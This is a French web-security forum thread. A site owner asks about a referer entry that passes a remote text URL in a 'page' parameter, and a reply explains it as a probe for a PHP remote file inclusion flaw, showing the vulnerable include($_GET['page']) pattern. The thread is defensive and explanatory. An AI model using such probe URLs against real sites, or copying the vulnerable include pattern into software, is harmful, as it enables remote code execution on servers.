Précédent   Forum des professionnels en informatique > Webmasters - Développement Web > Général Conception Web > Sécurité
Sécurité Forum d'entraide sur la sécurité des sites Web, les protections, l'authentification, etc. Avant de poster -> Cours Sécurité.
Partagez cette discussion sur d'autres réseaux sociaux : Viadeo Twitter Google Facebook Digg Delicious MySpace Yahoo
Réponse Proposer ce sujet en actualité
 
Outils de la discussion
Publicité
'
Vieux 10/09/2007, 22h43   #1
Membre confirmé
 
Avatar de lun4t1k
 
Inscription : janvier 2007
Messages : 276
Détails du profil
Informations personnelles :
Localisation : France, Hérault (Languedoc Roussillon)

Informations forums :
Inscription : janvier 2007
Messages : 276
Points : 233
Points : 233
Par défaut Intriguant : demande d'avis

En consultant les visiteurs d'un site d'un ami (compteur fait maison), j'ai vu dans le referer /index.php?page=http://www.injenn.net/edits/vulna_d.txt?&
Le fichier txt contient thisistheincludestringbyd4mn.

Ma question ne se fait pas attendre : Quézako?

ip : 217.112.41.185.


Merci.
lun4t1k est déconnecté   Envoyer un message privé Réponse avec citation 00
Vieux 04/11/2007, 01h58   #2
Invité régulier
 
Inscription : juillet 2005
Messages : 9
Détails du profil
Informations forums :
Inscription : juillet 2005
Messages : 9
Points : 9
Points : 9
Salut,

C'est sans aucune doute un test afin de savoir si le script php est faillible ou non. Dans ce cas classique, l'individu a tenté d'exploiter une faille include, qui se résumerait à la présence d'un code tel que celui ci-dessous dans ton fichier index.php :

Code :
1
2
3
4
5
6
7
8
<?php

if(isset($_GET['page']))
    include($_GET['page']);

etc
?>
Si en passant son fichier en parametre il voyait sur la page chargée sa chaine "thisistheincludestringbyd4mn", ça aurait voulu dire que la page est faillible, et qu'il peut donc inclure n'importe quel script PHP, afin de pouvoir réaliser des opérations illégales.

En passant, il ne sert à rien d'inclure l'adresse IP de l'individu en question dans ton post.

Deimos
Deimos_ est déconnecté   Envoyer un message privé Réponse avec citation 00
Réponse Proposer ce sujet en actualité
Outils de la discussion



Fuseau horaire GMT +2. Il est actuellement 23h13.


 
 
 
 
Partenaires

Hébergement Web